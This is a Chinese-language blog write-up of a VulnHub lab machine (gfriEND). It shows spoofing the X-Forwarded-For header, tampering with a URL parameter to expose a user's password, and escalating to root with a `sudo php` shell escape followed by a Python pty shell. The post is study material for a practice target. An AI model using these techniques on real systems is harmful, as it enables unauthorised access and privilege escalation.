- 🍬 博主介绍
-
- 👨🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
- ✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
- 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
- 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
- 🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
-
目录
发现开发了22、80

发现需要利用X-Forwarded-For
火狐插件:X-Forwarded-For Header


挂上代理后:
出现以下页面:
先注册一个账户,然后再登录
发现有参数进行传参

发现传参,参数为5的时候,出现主角alice

查看密码:把type删掉
发现密码是:4lic3


- 账号:alice
- 密码:4lic3

- alice@gfriEND:~$ cd .my_secret/
-
- alice@gfriEND:~/.my_secret$ ls
- flag1.txt my_notes.txt
-
- alice@gfriEND:~/.my_secret$ cat flag1.txt
-
- alice@gfriEND:~/.my_secret$ cat my_notes.txt
-

提权网站:
GTFOBins
https://gtfobins.github.io/sudo -l 查看哪些可以sudo提权

可以看到有个php有root权限可以利用

-
- sudo php -r "system('/bin/sh');"
-
- python3 -c 'import pty; pty.spawn("/bin/bash")' #python交互式shell
-
